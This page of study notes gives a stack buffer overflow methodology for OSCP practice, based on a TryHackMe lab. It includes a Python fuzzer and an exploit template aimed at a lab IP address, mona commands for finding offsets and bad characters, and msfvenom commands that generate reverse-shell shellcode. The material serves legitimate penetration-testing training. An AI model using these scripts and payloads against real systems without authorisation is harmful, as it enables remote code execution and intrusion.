Buffer Overflow Methodology
Buffer Overflow Methodology for OSCP from TryHackMe Buffer Overflow Prep
1. Fuzz application to find number of bytes needed to crash the application
import socket, time, sys
ip = "10.10.50.84"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "
string = prefix + "A" * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
except:
print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)
2. Set mona configuration
!mona config -set workingfolder c:\mona\%p
3. Find EIP
offset
EIP
offsetimport socket
ip = "10.10.50.84"
port = 1337
prefix = "OVERFLOW2 " ## optional
eip_offset = 0
overflow = "A" * eip_offset
retn = "" ## If retn address == 0x625011af. Set retn address in script == \xaf\x11\x50\x62
padding = "" ## For nop sled
payload= "" ## Shellcode frm msfvenom
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
4. Find bad characters
Generate byte array in mona:
!mona bytearray -b "\x00"
Compare to find the bad character:
!mona compare -f C:\mona\oscp\bytearray.bin -a
5. Find jmp esp
instruction sets without any bad characters
jmp esp
instruction sets without any bad charactersInsert bad characters after -cpb
flag.
!mona jmp -r esp -cpb "\x00"
6. Generate shellcode
Insert bad characters after -b
flag.
Windows -
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "\x00" -f c
Linux -
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00" -f c
7. Set nop
sled in padding
nop
sled in padding"\x90" * 24
Last updated
Was this helpful?